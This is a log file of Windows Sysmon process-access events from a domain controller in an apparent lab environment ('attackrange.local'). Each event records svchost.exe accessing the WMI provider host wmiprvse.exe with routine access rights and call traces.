{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.018\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.018","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.018\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.018","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.018\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.018","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
